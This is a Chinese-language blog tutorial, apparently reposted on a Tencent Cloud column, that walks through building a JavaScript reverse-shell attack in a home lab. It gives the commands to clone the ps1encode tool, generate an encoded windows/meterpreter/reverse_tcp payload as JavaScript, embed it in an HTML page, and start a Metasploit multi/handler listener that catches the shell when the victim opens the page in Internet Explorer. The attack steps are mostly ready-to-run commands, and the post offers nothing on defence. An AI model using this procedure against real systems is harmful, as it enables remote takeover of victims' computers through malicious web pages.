专栏首页行云博客基于JavaScript的rce反弹shell漏洞

基于JavaScript的rce反弹shell漏洞

本文转自行云博客https://www.xy586.top/

文章目录

环境要求

kali攻击机 192.168.232.131 win10靶机 192.168.232.140

工具地址

https://github.com/CroweCybersecurity/ps1encode

攻击步骤

拉取工具到kali的根目录下

git clone https://github.com/CroweCybersecurity/ps1encode.git

给权限

chmod +x pslencode

生成恶意js代码

./ps1encode.rb --lhost 192.168.232.131 --lport 4444 --payload windows/meterpreter/reverse_tcp --ENCODE cmd -t js

将生成的js代码放入一个js文件中,并通过HTML文件引入

使用msf框架监听

use exploit/multi/handler
Set lport 4444
Set lhost 192.168.232.131
run

靶机使用IE浏览器访问做好的HTML文件(此文件引入了恶意的js代码)

成功(PS:4444端口没成功,临时换成8848)

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Linux学习笔记——Apache的安装与配置

    阿里云镜像站:https://developer.aliyun.com/mirror/

    行云博客
  • Github文件在线加速下载

    众所周知,GitHub是一个巨大的开源宝库,以及程序员和编程爱好者的聚集地,诸多优秀的开源项目全部都是位于GitHub上。但是每当我们看到优秀的开源项目,准备去...

    行云博客
  • Linux学习——selinux

    Enforcing:强制模式。代表SELinux在运行中,且已经开始限制domain/type之间的验证关系 Permissive:宽容模式。代表SELinu...

    行云博客
  • java实现支付宝支付完整过程(沙箱测试环境,下篇整合ssm)

    好好学java
  • 数据库安全·Token 认证

    以下节选择《Netkiller Architect 手札》 作者:netkiller 地址 http://www.netkiller.cn/archit...

    netkiller old
  • 使用p3p跨域设置Cookie

    有些时候不能将url上的参数传来传去,比如与调用某开放平台上的接口,这时候可能需要借助Cookie来进行处理了,但这里可能又涉及到跨域的问题。

    meteoric
  • 收好!这 4 个出门必备小工具,能让你的旅途轻松加愉快

    虽然走到哪里都人山人海,可是这样难得的黄金周,一年只有一次,你真的舍得在家刷着朋友圈逛世界吗?

    知晓君
  • 深度学习在医学影像上的应用(三)——分割

    上一篇给大家介绍了深度学习在医学影像上关于图像重建及后处理,图像标注,图像配准,图像超分辨率和回归的应用,这一篇我将继续分享深度学习在分割上的应用。

    医学处理分析专家
  • Docker Compose部署Gitlab

    YP小站
  • 2019 PHP程序员发展路线

    新的一年,新气象。在2012年我参加LAMP兄弟连的培训,成为一名PHP程序员。那个时候PHP盛行,简直有称霸世界的迹象。当然现在我大PHP也不差。我认为成为P...

    CrazyCodes

扫码关注云+社区

领取腾讯云代金券